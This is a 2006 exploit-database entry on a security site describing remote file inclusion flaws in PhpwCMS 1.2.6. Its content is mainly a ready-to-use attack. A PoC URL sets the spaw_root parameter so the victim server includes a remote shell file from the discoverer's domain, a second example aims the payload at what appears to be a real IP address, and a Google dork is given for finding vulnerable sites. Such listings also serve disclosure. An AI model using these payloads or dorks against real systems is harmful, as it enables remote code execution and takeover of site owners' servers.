|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 976 Credit : Morgan Date : 10.08.2006 Exploit Code : PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities Discovered by : |/| _ ._ _ _.._ | |(_)| (_|(_|| | _| Vuln In : include $spaw_root.'class/lang.class.php'; Affected Files : include/inc_ext/spaw/dialogs/table.php include/inc_ext/spaw/dialogs/a.php include/inc_ext/spaw/dialogs/colorpicker.php include/inc_ext/spaw/dialogs/confirm.php include/inc_ext/spaw/dialogs/img.php include/inc_ext/spaw/dialogs/img_library.php include/inc_ext/spaw/dialogs/td.php Vendor Website: http://www.phpwcms.de/ PoC: http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http:// ehmo rgan.net/shell.dat? Example: http://132.195.14.67/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_ro ot=h ttp://ehmorgan.net/shell.dat? Google Dork: inurl:"phpwcms/index.php?id=" Visit us : www.ehmorgan.net irc.gigachat.net #Morgan  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |